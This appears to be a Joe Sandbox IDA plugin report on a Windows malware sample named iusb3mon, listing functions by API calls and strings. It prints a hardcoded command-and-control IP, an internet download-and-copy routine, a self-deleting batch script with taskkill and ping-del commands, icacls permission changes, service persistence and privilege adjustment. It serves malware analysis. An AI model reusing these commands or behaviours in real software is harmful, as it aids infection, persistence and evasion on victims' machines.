Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Delete$Sleep$AttributesCountProcessTick$AddressCloseCreateExecExecuteExitHandleLibraryLoadModuleNameProcShellTerminateWritelstrcat
String ID: A$C:\ProgramData\Microsoft\Program\ziliao$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Microsoft\Program\ziliao.jpg1$C:\ProgramData\Microsoft\ziliao.jpg$G$KERNEL32.dll$P$Plugin32.dll$Ru%d%s$T$a$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$e$e$h$m$open$p$t$t
API String ID: 1333362825-3008771302
Opcode ID: 82162f357c8fdafe8c10181daa18999925b3238ed08a122ea56b9d7e5c13810d
Instruction ID: 36c4c565105cc89e6e762f756ad3f760d5d35b8e005f612036b264b5a531ec38
Opcode Fuzzy Hash: 82162f357c8fdafe8c10181daa18999925b3238ed08a122ea56b9d7e5c13810d
Instruction Fuzzy Hash: FC8181718042C9EEFB5197B8DC4CBEE7F7D9B16304F084189E25866291C7BA4A48C776

Function 06CF739A Relevance: 60.1, APIs: 1, Strings: 39, Instructions: 79COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06CF7480

Part of subcall function 06CF91B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF9216
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 06CF922E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 06CF923E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 06CF924E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 06CF925B
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06CF9268
Part of subcall function 06CF91B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93F3

Strings

i, xrefs: 06CF7461
e, xrefs: 06CF7469
\, xrefs: 06CF7405
u, xrefs: 06CF740D
C, xrefs: 06CF7409
\, xrefs: 06CF744D
n, xrefs: 06CF741D
S, xrefs: 06CF7441
e, xrefs: 06CF7445
Console, xrefs: 06CF7493
e, xrefs: 06CF7419
r, xrefs: 06CF7415
\, xrefs: 06CF7471
c, xrefs: 06CF7465
e, xrefs: 06CF7455
E, xrefs: 06CF73FD
S, xrefs: 06CF73ED
r, xrefs: 06CF7435
t, xrefs: 06CF7431
Y, xrefs: 06CF73F1
r, xrefs: 06CF7459
S, xrefs: 06CF73F5
n, xrefs: 06CF742D
s, xrefs: 06CF746D
C, xrefs: 06CF7425
o, xrefs: 06CF7439
t, xrefs: 06CF7421
t, xrefs: 06CF7449
M, xrefs: 06CF7401
lSet\Services\%s, xrefs: 06CF7487
%, xrefs: 06CF7475
v, xrefs: 06CF745D
T, xrefs: 06CF73F9
S, xrefs: 06CF7451
l, xrefs: 06CF743D
o, xrefs: 06CF7429
s, xrefs: 06CF7479
r, xrefs: 06CF7411
lSet\Services\%s, xrefs: 06CF73A5

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadwsprintf
String ID: %$C$C$Console$E$M$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
API String ID: 1476185493-1609218977
Opcode ID: 3668f3c45e74a1c2d5f819742074ec77417a33e545ad215b2dc8c252645c74e6
Instruction ID: 0b2114877deff83ae3a799032b2a6f3ef7995cb622933981116e0c9c0deebcb1
Opcode Fuzzy Hash: 3668f3c45e74a1c2d5f819742074ec77417a33e545ad215b2dc8c252645c74e6
Instruction Fuzzy Hash: 6B31B150D0C6C9EDEF42C6A888487DFBFB55B26249F084098D2943A292C6FF575887B6

Function 06CF3DF2 Relevance: 56.1, APIs: 24, Strings: 8, Instructions: 142threadprocesssleepCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06CF3E0C
WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06CF3E14
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF3E1B

Part of subcall function 06CF2A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06CF2661,c:\inst.ini), ref: 06CF2A2B
Part of subcall function 06CF2A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A40
Part of subcall function 06CF2A15: CloseHandle.KERNEL32(00000000,?,06CF2661,c:\inst.ini), ref: 06CF2A4D

Sleep.KERNEL32(c:\del,?,?), ref: 06CF3E38

Part of subcall function 06CF29CE: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,76230F00,?,06CF3E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF29E4
Part of subcall function 06CF29CE: WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06CF3E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF29FC
Part of subcall function 06CF29CE: CloseHandle.KERNEL32(00000000,?,06CF3E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF2A09

Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF3E4B
WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06CF3E53
Sleep.KERNEL32(000003E8,?,?), ref: 06CF3E5A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06CF3E6A
GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06CF3E83
GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06CF3E9A
SetFileAttributesA.KERNEL32(?,00000080,?,?), ref: 06CF3EB7
GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,?), ref: 06CF3F32
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06CF3F3F
GetCurrentThread.KERNEL32 ref: 06CF3F43
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06CF3F50
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 06CF3F69
SetPriorityClass.KERNEL32(?,00000040,?,?,?,?,?,?,?,?), ref: 06CF3F78
SetThreadPriority.KERNEL32(?,000000F1,?,?,?,?,?,?,?,?), ref: 06CF3F7F
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 06CF3F84
GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?), ref: 06CF3F94
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06CF3F9B
GetCurrentThread.KERNEL32 ref: 06CF3F9E
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 06CF3FA5
ExitProcess.KERNEL32 ref: 06CF3FA8

Strings

COMSPEC, xrefs: 06CF3E95
> nul, xrefs: 06CF3EE7
cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone", xrefs: 06CF3E07
c:\del, xrefs: 06CF3E21
cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone", xrefs: 06CF3E0F
/c ping -n 2 127.0.0.1 > nul && del , xrefs: 06CF3EC3
D, xrefs: 06CF3F20
C:\ProgramData\Microsoft\del.bat, xrefs: 06CF3E16, 06CF3E3A, 06CF3E4E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$PriorityThread$CurrentProcess$ClassCreateExecSleep$CloseHandleNameWrite$AttributesDeleteEnvironmentExitModulePathResumeShortVariable
String ID: /c ping -n 2 127.0.0.1 > nul && del $ > nul$C:\ProgramData\Microsoft\del.bat$COMSPEC$D$c:\del$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone"
API String ID: 1606893727-1022896001
Opcode ID: 6a2dda7b355ac75732072c5709e9bcaecc3d7d83834cc4bf4a7b292c41b1defd
Instruction ID: 9167cf1363e8b86f81fec19fa46d0633276454c327187b3f13ad60a4fe2a0346
Opcode Fuzzy Hash: 6a2dda7b355ac75732072c5709e9bcaecc3d7d83834cc4bf4a7b292c41b1defd
Instruction Fuzzy Hash: 7A418371940259BBEBA0ABF1DC49FDF7B7DEF44740F000855F315E6150DAB09A488BA5

Function 06CF510D Relevance: 54.5, APIs: 23, Strings: 8, Instructions: 287registrystringsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF5112
wsprintfA.USER32 ref: 06CF5148
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 06CF515A
GetLastError.KERNEL32 ref: 06CF5166
ReleaseMutex.KERNEL32(00000000), ref: 06CF5174
CloseHandle.KERNEL32(00000000), ref: 06CF517B
RegOpenKeyExA.ADVAPI32(80000001,Console,00000000,00020019,?), ref: 06CF51D2
RegQueryValueExA.ADVAPI32(?,Groupfenzhu,00000000,?,00000000,?), ref: 06CF51F3
RegCloseKey.ADVAPI32(?), ref: 06CF5210
RegQueryValueExA.ADVAPI32(?,Remarkbeizhu,00000000,?,00000000,?), ref: 06CF5228
RegCloseKey.ADVAPI32(?), ref: 06CF5245
RegQueryValueExA.ADVAPI32(?,MarkTime,00000000,?,00000000,?), ref: 06CF525D
RegCloseKey.ADVAPI32(?), ref: 06CF526D
_rand.LIBCMT ref: 06CF5288
Sleep.KERNEL32(00000BB8,?,00006365), ref: 06CF5292
lstrcatA.KERNEL32(?,?), ref: 06CF5347
lstrcatA.KERNEL32(00000000,143.92.60.116), ref: 06CF5370
strcmp.MSVCRT ref: 06CF5382
GetTickCount.KERNEL32 ref: 06CF5397
GetTickCount.KERNEL32 ref: 06CF53B3
lstrcpyA.KERNEL32(06D22AD4,?,?,?,00006365,00000000), ref: 06CF53ED
WaitForSingleObject.KERNEL32(?,00000064,?), ref: 06CF543F
Sleep.KERNEL32(000001F4), ref: 06CF544C

Strings

SYSTEM\CurrentControlSet\Services\, xrefs: 06CF5198
Console, xrefs: 06CF51C8
Default, xrefs: 06CF51F9
Remarkbeizhu, xrefs: 06CF5220
%s:%d:%s, xrefs: 06CF5142
Groupfenzhu, xrefs: 06CF51E8
MarkTime, xrefs: 06CF5255
143.92.60.116, xrefs: 06CF513D, 06CF536A

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$CountMutexSleepTicklstrcat$CreateErrorH_prologHandleLastObjectOpenReleaseSingleWait_randlstrcpystrcmpwsprintf
String ID: %s:%d:%s$143.92.60.116$Console$Default$Groupfenzhu$MarkTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\
API String ID: 2892932112-2209769630
Opcode ID: c7af3ee58748b72ec3e1cc38dbff6cc09e3bc1f205f89a376ffdc9f3e76abc65
Instruction ID: f83fca0304d7421020a7faf661c52f8010d8ad05475fa89db46def7719291bdf
Opcode Fuzzy Hash: c7af3ee58748b72ec3e1cc38dbff6cc09e3bc1f205f89a376ffdc9f3e76abc65
Instruction Fuzzy Hash: BDA1C172D2025ABFDBE1DBA1DD48EEEBB7DAF14341F100166E309A6140DB749B48CB60

Function 06CF4FA7 Relevance: 43.8, APIs: 3, Strings: 22, Instructions: 81stringtimeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,75B4EA50), ref: 06CF4FB5
wsprintfA.USER32 ref: 06CF5056
lstrlenA.KERNEL32(?,00000000), ref: 06CF508C

Part of subcall function 06CF9423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,06D1CB7A,?,00000000,06CFADE0,06D0E538,000000FF,?,06CF56BE,80000001,Console,Groupfenzhu,00000001,06D1CB7A), ref: 06CF9450
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06CF9467
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06CF9472
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 06CF947D
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06CF9488
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06CF9493
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 06CF949E
Part of subcall function 06CF9423: FreeLibrary.KERNEL32(00000000,?,00000000,06CFADE0,06D0E538,000000FF,?,06CF56BE,80000001,Console,Groupfenzhu,00000001), ref: 06CF9592

Strings

%, xrefs: 06CF5032
, xrefs: 06CF502E
., xrefs: 06CF5022
., xrefs: 06CF500E
2, xrefs: 06CF5026
:, xrefs: 06CF5042
2, xrefs: 06CF504E
2, xrefs: 06CF5012
d, xrefs: 06CF502A
%, xrefs: 06CF5046
., xrefs: 06CF5036
-, xrefs: 06CF501A
Console, xrefs: 06CF50A0
%, xrefs: 06CF500A
%4d-, xrefs: 06CF4FFF, 06CF5002
MarkTime, xrefs: 06CF509A, 06CF509F
d, xrefs: 06CF5016
d, xrefs: 06CF503E
d, xrefs: 06CF5052
2, xrefs: 06CF503A
%, xrefs: 06CF501E
., xrefs: 06CF504A

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadLocalTimelstrlenwsprintf
String ID: $%$%$%$%$%4d-$-$.$.$.$.$2$2$2$2$:$Console$MarkTime$d$d$d$d
API String ID: 1129135643-4086575212
Opcode ID: 285a719d92bab6a4542c1abed21934a590ce290987d10ac9145087f61773d006
Instruction ID: 98b695e813cd92ce1c13a82d5d5e91fa639ff5cae6ba94be16be73838d870ee5
Opcode Fuzzy Hash: 285a719d92bab6a4542c1abed21934a590ce290987d10ac9145087f61773d006
Instruction Fuzzy Hash: 67411061C083D8E9EB12C7E8D8087DEBFF91B15708F0440C9E184BA282D6FA4758C776

Function 06CF6316 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 169filelibraryloaderCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,06CF44DD,00000000,00000001), ref: 06CF6344
LoadLibraryA.KERNEL32(wininet.dll), ref: 06CF6357
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 06CF636E
InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 06CF638E
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 06CF639A
FreeLibrary.KERNEL32(00000000), ref: 06CF63BC
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 06CF63D9
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 06CF6409
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 06CF6496
CloseHandle.KERNEL32(?), ref: 06CF64A8
Sleep.KERNEL32(00000001), ref: 06CF64B3
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 06CF64BF
FreeLibrary.KERNEL32(00000000), ref: 06CF64D2
CopyFileA.KERNEL32(?,?,00000000), ref: 06CF64E3
CloseHandle.KERNEL32(?), ref: 06CF64F3
DeleteFileA.KERNEL32(?), ref: 06CF6500

Strings

InternetOpenA, xrefs: 06CF6365
wininet.dll, xrefs: 06CF634C
InternetCloseHandle, xrefs: 06CF64B9
InternetOpenUrlA, xrefs: 06CF6394
MSIE 6.0, xrefs: 06CF6374
%s1, xrefs: 06CF632F
404, xrefs: 06CF6422
InternetReadFile, xrefs: 06CF6401

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$AddressProc$Library$CloseDeleteFreeHandle$ConnectCopyCreateInternetLoadSleepWrite
String ID: %s1$404$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 1518507476-3861321592
Opcode ID: 29f6f0175eb392b4968b528abea171fcb35208cf4b0d2f1fc87cc2ecd6458a12
Instruction ID: 868570a1d8d5767b07cf1e820c944bcd64e20b6e44989587bad91d7486afedf4
Opcode Fuzzy Hash: 29f6f0175eb392b4968b528abea171fcb35208cf4b0d2f1fc87cc2ecd6458a12
Instruction Fuzzy Hash: 2551827291011DBFEF909BA1DC88EEE7B7EEF08254F104465F605E6150DB709E859B60

Function 06CF8FF7 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,06CF39FA,SeShutdownPrivilege,00000001,?,06CF200F,?), ref: 06CF900F
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 06CF901F
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 06CF902A
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06CF9035
LoadLibraryA.KERNEL32(kernel32.dll,?,06CF39FA,SeShutdownPrivilege,00000001,?,06CF200F,?), ref: 06CF903F
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 06CF904A
LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06CF9092
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 06CF909A
CloseHandle.KERNEL32(?), ref: 06CF90A9
FreeLibrary.KERNEL32(00000000), ref: 06CF90BA
FreeLibrary.KERNEL32(00000000), ref: 06CF90C5

Strings

KERNEL32.dll, xrefs: 06CF908D
kernel32.dll, xrefs: 06CF9037
SeShutdownPrivilege, xrefs: 06CF8FFE
AdjustTokenPrivileges, xrefs: 06CF9021
GetLastError, xrefs: 06CF9094
GetCurrentProcess, xrefs: 06CF9041
ADVAPI32.dll, xrefs: 06CF9006
OpenProcessToken, xrefs: 06CF9019
LookupPrivilegeValueA, xrefs: 06CF902C

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseHandle
String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
API String ID: 2887716753-2040270271
Opcode ID: 51782e0d0acf9f43af6b0124af371f9ab89687d7b9c5b1991876599552e38085
Instruction ID: 23e836dc87b637c4b1b97f966901916c0184664ca36ba7ea74f290b293d0f985
Opcode Fuzzy Hash: 51782e0d0acf9f43af6b0124af371f9ab89687d7b9c5b1991876599552e38085
Instruction Fuzzy Hash: 2B214C71D40219BAEF50ABF6DC49FEFBFB8EF08600F004455FA00E6141DAB49A48CBA1

Function 06CF58AD Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 116sleepregistryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(06D1CA80,06CF59C2), ref: 06CF58C3
SetServiceStatus.ADVAPI32(00000000,06D23118), ref: 06CF5913
Sleep.KERNEL32(000001F4), ref: 06CF5921
GetVersionExA.KERNEL32(?), ref: 06CF5938
SetServiceStatus.ADVAPI32(06D23118), ref: 06CF5958

Part of subcall function 06CF571E: CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,143.92.60.116,06D1CC34,06CF6CAB), ref: 06CF5729
Part of subcall function 06CF571E: GetLastError.KERNEL32 ref: 06CF5731
Part of subcall function 06CF571E: CloseHandle.KERNEL32(00000000), ref: 06CF573F

Sleep.KERNEL32(0000003C), ref: 06CF5961
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF5977
wsprintfA.USER32 ref: 06CF5990
CloseHandle.KERNEL32(00000000), ref: 06CF59A6
SetServiceStatus.ADVAPI32(06D23118), ref: 06CF59B9
SetServiceStatus.ADVAPI32(06D23118,06D23118,75B504E0,00000001,00000000), ref: 06CF59FF
Sleep.KERNEL32(000001F4), ref: 06CF5A06
SetServiceStatus.ADVAPI32(06D23118), ref: 06CF5A20
SetServiceStatus.ADVAPI32(06D23118,06D23118,75B504E0,00000001,00000000), ref: 06CF5A43
Sleep.KERNEL32(000001F4), ref: 06CF5A4A
SetServiceStatus.ADVAPI32(06D23118,06D23118,75B504E0,00000001,00000000), ref: 06CF5A7E
Sleep.KERNEL32(000001F4), ref: 06CF5A85

Strings

%s Win7, xrefs: 06CF598A

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Service$Status$Sleep$CloseHandle$CreateCtrlErrorFileHandlerLastModuleMutexNameRegisterVersionwsprintf
String ID: %s Win7
API String ID: 2853745164-511819196
Opcode ID: 55e6d961889e4aec8091835191e7afebb84892ce52c3120eb23fca063090c85b
Instruction ID: dad115a8f4fd6d7d253fb0f430a4e9e28c0b7a03f42468aa87423411d98f8985
Opcode Fuzzy Hash: 55e6d961889e4aec8091835191e7afebb84892ce52c3120eb23fca063090c85b
Instruction Fuzzy Hash: 2641A370510216AFF7B29F61EC4AB967BBAE76571AF014019E34896380CBB845C9CFA1

Function 06D0956B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 170stringCOMMON

Download Yara Rule

APIs

Part of subcall function 06D0C82F: TlsGetValue.KERNEL32(00000000,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773,?,?,00000100), ref: 06D0C86E

CallNextHookEx.USER32(?,00000003,?,?), ref: 06D09595
GetClassLongA.USER32(?,000000E6), ref: 06D095DC
GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,?,06D0C4D2), ref: 06D09608
lstrcmpiA.KERNEL32(?,ime), ref: 06D09617
GetWindowLongA.USER32(?,000000FC), ref: 06D0968A
SetWindowLongA.USER32(?,000000FC,00000000), ref: 06D096AB

Strings

AfxOldWndProc423, xrefs: 06D096EC, 06D096F1, 06D096FC, 06D09704, 06D0970D
ime, xrefs: 06D09611

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
String ID: AfxOldWndProc423$ime
API String ID: 3731301195-104836986
Opcode ID: 3b08edb377217f3132eabf3e64735eccbb71dd97014b463f37227b36ce2cb59c
Instruction ID: 149e0f46419f085466491c6e4d5cee0297d331bffae96944d7a46da75f888329
Opcode Fuzzy Hash: 3b08edb377217f3132eabf3e64735eccbb71dd97014b463f37227b36ce2cb59c
Instruction Fuzzy Hash: BD51BF71900225AFEB609F64CC58BAE7BB9FF48361F205614FA15AB2D2D730D944CBE0

Function 06CF9423 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 144libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,06D1CB7A,?,00000000,06CFADE0,06D0E538,000000FF,?,06CF56BE,80000001,Console,Groupfenzhu,00000001,06D1CB7A), ref: 06CF9450
GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06CF9467
GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06CF9472
GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 06CF947D
GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06CF9488
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06CF9493
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 06CF949E
